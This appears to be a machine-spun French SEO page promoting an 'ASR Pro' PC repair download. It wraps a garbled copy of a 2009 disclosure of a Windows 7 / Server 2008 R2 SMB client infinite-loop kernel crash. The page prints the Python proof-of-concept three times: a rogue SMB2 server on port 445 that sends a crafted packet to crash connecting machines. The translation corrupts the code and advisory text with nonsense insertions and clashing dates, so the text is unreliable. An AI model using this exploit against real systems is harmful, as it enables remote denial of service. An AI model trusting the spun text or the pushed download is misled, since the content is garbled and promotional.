Table of Contents

 

Approuvé

  • 1. Télécharger ASR Pro
  • 2. Ouvrez le programme et sélectionnez "Analyser votre ordinateur"
  • 3. Cliquez sur "Réparer" pour lancer le processus de réparation
  • Le logiciel pour réparer votre PC est à portée de clic - téléchargez-le maintenant.

    Si Windows 9 / Server 2008r2 Remote Kernel plante souvent sur votre ordinateur, nous espérons que ce guide de l’utilisateur pourra aider une personne à résoudre le problème. g.Microsoft Windows utile / Server 2008 R2 SMB Client Infinite Loop: Il exploite un bon échec solide pour effectuer des opérations dans je dirais le client Microsoft Windows SMB trouvé sur Windows 7 plus Windows Server 2008 R2. Il échoue principalement le noyau de support de PC distant. Le Framework Metasploit contient un segment pour exploiter ma vulnérabilité.

     

     

    g. # ! /usr/tray/python# win7-crash.Trigger py :# crash du noyau de support informatique en ligne sur le serveur hôte Win7 avec 2008R2 (boucle infinie)# Échec de KeAccumulateTicks () en raison de NT_ASSERT () / DbgRaiseAssertionFailure () causé par de puissants# Cycle sans fin.# PAS DE BSOD, VOUS DEVEZ DEBRANCHER LE CONNECTEUR.# Pour l'appeler rapidement ; ordre proche : this_script_ip_addr BLAH, faible consommation soudaine sans effort# Auteur : Laurent Gaffi¯ ¿ ½Importer le serveur de socketPackage = (" x00 x00 x00 x9a" nombre étendu distance ---> doit être 9ème, pas 9a .." xfe x53 x4d x42 x40 x00 x00 x00 x00 x00 x00 x00 x00 x00 x01 x00"" x01 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00"" x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00"" x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00"" x41 x000???#A""?K???R1?"" x00 x00?sgtb`?""?Q?b`?? LM ""`+?0sony ericsson xperia x10?""0 +?7")Formation SMB2 (SocketServer.BaseRequestHandler) : Def-Handle (elle-même) : sérigraphie « Qui : », self.client_address Utilisez "MERCI SDL" L'entrée implique self.request.recv (1024) self.request.send (paquet) self.request.close ()le lancement implique SocketServer.TCPServer (('', 445), le numéro SMB2) écoute sur toutes les interfaces en ville 445launch.serve_forever ()

    Cette erreur est une preuve importante que SDL FAIL
    La cible de l’erreur est simplement une boucle infinie sur smb1,2, pré-authentification, principalement aucune information d’identification requise …
    Peut s’avérer être lancé sur le réseau local reçu de (IE *)
    L’erreur est très probablement si simple que la maison aurait dû être découverte il y a quelque temps par un SDL spécifique dans le cas où le SDL existait déjà :

    netbios_header est égal à struct.pack (“> i”, len (”. visite (SMB_packet)) + SMB_packet
    (Les mots de balise netbios h2 indiquent la longueur du nouveau paquet smb1,2.)

    Si ce nombre netbios_header est inférieur de 4 octets et supérieur à SMB_packet, la situation est tout simplement violée !
    QUEL GENRE ?? Vous plaisantez, où est le SDL personnel ? ! ?

    Windows 7 / Internet Computer 2008r2 crash du noyau distant

    “Le système d’utilisation le plus sûr sur la lumière. е “;
    Que votre pare-feu correct soit conçu doit être supprimé via IE, peut-être même avec la méthode de diffusion nbns (aucune interaction avec l’acheteur)

    ================================================
    – Sortie sortir avec : 11 novembre 2009
    – Découvert à l’époque de : Laurent Gaffier
    – Gravité : moyenne pour chaque haut
    ==============================================

    windows 1 / server 2008r2 far kernel crash

    NS. CONFIRMATION DU CONCEPT
    ————————–
    # win7-crash.py :
    # Exécution d’un énorme plantage du noyau distant sous Win7 puis donc Server 2008R2 (boucle infinie)
    # KeAccumulateTicks () s’est écrasé en raison de NT_ASSERT () / DbgRaiseAssertionFailure () causé par l’utilisation de # forte boucle infinie.
    # PAS DE BSOD, VOUS AVEZ UN LIÈGE.
    # Pour l’appeler rapidement ; dans l’ensemble : this_script_ip_addr BLAH, diminuez maintenant
    # Posté par Laurent Gaffier
    #

    Package = (nombre ” x00 x00 x00 x9a” —> la neuvième longueur devrait vraiment être 9a ..
    ” xfe x53 x4d x42 x40 x00 x00 x00 x00 x00 x00 x00 x00 x00 x01 x00″
    ” x01 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00″
    ” x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00″
    ” x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00″
    ” x41 x000???#A”
    “?K???R1?”
    ” x00 x00?sgtb`?”
    “?Q?b`?? LM ”
    “`+?0?”
    “0 +?7”)

    V. IMPACT COMMERCIAL
    ————————–
    Un attaquant peut loin des autres désactiver n’importe quel serveur Windows 2008R2 certains /
    sur le réseau local sinon via IE

    VII. Possibilité de patch
    ————————–
    n’est pas disponible pour ce scénario, votre FAI s’en fiche.
    Fermez la fonction SMB et les ports jusqu’à ce qu’un examen valide soit fourni.

    X. HISTORIQUE DES CHANGEMENTS
    ————————–
    8 novembre 2009 : MSRC a téléphoné à
    8 novembre 2009 : MSRC a découvert une vulnérabilité
    11 novembre 2009 : MRSC essaie de me convaincre car il existe sans aucun doute un bogue IPv6 de divers magasins qui ne devrait pas apparaître dans les bulletins de mesures de sécurité.
    11 novembre 2009 : Ce bug coûteux a été publié.

    XI. REMARQUES
    ————————–
    Les informations légales contenues dans cet avis sont fournies “en l’état”
    sans représentations ou garanties dans les délais ou autrement.
    Je n’accepte pas beaucoup de dommages causés par l’opérateur ainsi que
    Utilisation abusive de ces informations.

    Divulgation complèteArchives de la liste de diffusion

    Erreurs du noyau distant Windows 7 Server 2008R2De : laurent gaffie
    Date : gmail mercredi 16 novembre 2009 05:58:44 – 05:00
    ==============================================- DATE d’émission : seize novembre 2009- Vient de découvrir : Laurent Gaffier- Gravité : Moyenne / Élevée.================================================I. VULNÉRABILITÉ————————–Verrouillage du noyau à distance Windows 1, * Server 2008R2II. LE CONTEXTE————————–# ÉCHEC, # ÉCHEC, # ÉCHECSDL FAIL, “Le système d’exploitation le plus sécurisé de tous les temps” -> Noyau distant en quelques minutes.# ÉCHEC, # ÉCHEC, # ÉCHECIII. LA DESCRIPTION————————–Voir : http://g-laurent.blogspot.com/ pour plus d’informations et divers détails.# Commentaire : Ce bug est connu même si Windows 7 / 2008R2.NS. PREUVE CONCEPTUELLE————————–# win7-crash.py :# L’exécution d’un autre noyau distant échoue sous Win7 en plus de l’équipement 2008R2 (boucle infinie)# KeAccumulateTicks () incidents dus à NT_ASSERT () / DbgRaiseAssertionFailure ()invocation d’une boucle sans fin.# PAS DE BSOD, VOUS DEBRANCHEZ LE CONNECTEUR.# Pour établir rapidement à partir de la cible : this_script_ip_addr BLAH, immédiatementcrash#Auteur : Laurent Gaffier#Importer le serveur de socketLe package implique ” x00 x00 x00 x9a” # —> probablement neuvième, pas 9a.” xfe x53 x4d x42 x40 x00 x00 x00 x00 x00 x00 x00 x00 x00 x01 x00″” x01 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00″” x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00″” x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00″” x41 x000???#A””?K???R1?”” x00 x00?sgtb`?””?Q?b`?? LM “”`+?0sony ericsson xperia x10?””0 +?7”Classe SMB2 (SocketServer.BaseRequestHandler) : def gérer (auto): “Qui :” Image, self.client_address L’entrée indique self.request.recv (1024) self.request.send (paquet) self.request.close ()Start signifie SocketServer.TCPServer ((”, 445), SMB2) # à l’écoute sur tous les ports445exécutez interface.serve_forever ()#ÉCHEC SDLV. BUSINESS Attaque liée à l’agresseur————————–et peut planter à distance pratiquement Windows 7 / Server 2008R2.VI… SYSTÈMES RÉSERVÉS————————–Windows 7, Windows 2008R2VII serveur. SOLUTION————————–Il n’y a pas de patch au moment décisif, le vendeur ne s’en préoccupe pas vraiment.Fermez l’élément SMB et en outre les ports jusqu’à ce qu’un véritable audit soit généralement effectué.VIII. LES RÉFÉRENCES————————–http://blogs.msdn.com/sdl/http://g-laurent.blogspot.com/http://twitter.com/g_laurentIX. Prêts————————–Cette vulnérabilité a été réalisée par Laurent Gaffier. découvertLaurent.gaffieremove-this (at) gmail.comX. HISTORIQUE DES RÉVISIONS————————–8 novembre 2009 : appelé MSRC.9 novembre 2009 : MSRC a remarqué une vulnérabilité.11 novembre 2009 : MRSC essaie de se convaincre qu’IPv6 de divers fournisseurs est un énorme bug.ne doit pas apparaître dans les bulletins de sécurité.9 novembre 2009 : sortie de Win Remote 7 Kernel SmashXI. MENTION LÉGALE————————–Les informations contenues dans cet avis sont fournies « telles quelles ».sans garanties ou offres d’utilisation, ou en effectuant des travaux autrement.Je ne suis pas responsable des dommages causés par l’utilisation avec ouabuser de ces informations.XII Notes personnelles————————–D’autres noyaux de réparation d’ordinateurs en ligne FD @MS viendront à une date ultérieure.

     ________________________________________________GenderMy divulgation ainsi que des informations - faites confiance dès maintenant.Charte : http://lists.grok.org.uk/full-disclosure-charter.htmlVient de poster et sponsorisé par Secunia Http : // secunia-.com/ 

    Par date Par Câble

    Flux actuel :

    • Puissant crash du noyau distant Windows Server 2008R2 pour Laurent Gaffy (11 novembre)

    Approuvé

    L'outil de réparation ASR Pro est la solution pour un PC Windows qui fonctionne lentement, a des problèmes de registre ou est infecté par des logiciels malveillants. Cet outil puissant et facile à utiliser peut rapidement diagnostiquer et réparer votre PC, en augmentant les performances, en optimisant la mémoire et en améliorant la sécurité dans le processus. Ne souffrez plus d'un ordinateur lent - essayez ASR Pro dès aujourd'hui !


     

     

    Le logiciel pour réparer votre PC est à portée de clic - téléchargez-le maintenant.